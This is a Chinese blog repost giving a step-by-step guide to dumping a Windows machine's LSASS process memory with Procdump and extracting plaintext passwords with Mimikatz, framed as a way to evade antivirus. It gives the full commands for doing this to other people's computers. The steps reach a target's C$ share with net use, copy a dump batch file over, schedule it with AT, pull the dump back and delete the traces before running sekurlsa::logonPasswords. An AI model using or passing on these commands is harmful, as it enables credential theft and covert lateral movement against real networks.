• 利用procdump+Mimikatz 绕过杀软获取Windows明文密码(转)


    Mimikatz现在已经内置在Metasploit’s meterpreter里面,我们可以通过meterpreter下载。但是你如果觉得还要考虑杀毒软件,绑定payload之类的东西太过复杂,我们可以有更好的办法,只需要在自己的电脑上运行Mimikatz alpha(地址)版本,然后处理dump的LSASS进程内存文件就行!

    那么如何dump LSASS进程内存呢。可以通过以下方式:

    1.对于NT6可以使用windows自带的功能进行dump:

    任务管理器—进程—显示所有用户进程—找到lsass—右键“创建转储文件”

    1

    2

    2.对于NT5可以使用微软的Procdump工具(这当然不会引起杀软报毒)

    Procdump: http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx

    命令如下:

    1 Procdump.exe -accepteula -ma lsass.exe lsass.dmp

    3

    我们运行mimikatz的平台(platform)要与进行dump的系统(source dump)兼容,兼容性如下:

    4

    得到dump后的文件我们就能使用mimikatz获取密码了。我们dump自己的电脑当然没什么意思,下面介绍怎么dump别人的电脑。

    首先我们需要能够访问别人的C$(通常只有管理员可以)

    1 net use \TARGETBOXC$ /user:DOMAINUsername password
    2 dir \TARGETBOXC$

    如果上述命令好使的话,我们接下来使用AT命令。

    1 at \TARGETBOX

    接下来我们可以在目标主机上开展工作了。

    1 mkdir \TARGETBOXC$Temp
    2 dir \TARGETBOXC$Temp
    3 copy c: empprocdump.exe \TARGETBOXC$Temp
    4 copy c: empprocdump.bat \TARGETBOXC$Temp

    procdump.bat中的内容如下

    1 @echo off
    2 C: empprocdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp

    这里一个技巧就是dump得到的文件名中有“计算机名”,这样可以让我们区分是来dump的文件自哪台电脑。

    我们继续。 使用 net time 来获知远程主机上的时间。

    1 net time \TARGETBOX
    2 at \TARGETBOX 13:52 C:Tempprocdump.bat

    复制dump的文件,然后清理痕迹

    1 dir \TARGETBOXC$Temp
    2 copy \TARGETBOXC$Temp*lsass.dmp C: empoutput
    3 rmdir /s \TARGETBOXC$Temp

    之后我们就可以运行我们电脑上的Mimikatz,对得到的.dmp文件进行分析了(注意上文提到的兼容性)。命令如下:

    1 mimikatz # sekurlsa::minidump SUPERCOMPUTER_lsass.dmp
    2 Switch to MINIDUMP
    3  
    4 mimikatz # sekurlsa::logonPasswords full

    到此结束!我们得到了远程主机上的密码。

  • 相关阅读:
    欧拉公式求四面体的体积
    欧拉公式求四面体的体积
    I
    I
    闭包传递(floyed)
    闭包传递(floyed)
    Python hypot() 函数
    Python cos() 函数
    Python atan2() 函数
    Python atan() 函数
  • 原文地址:https://www.cnblogs.com/demonspider/p/3410736.html
Copyright © 2020-2023  润新知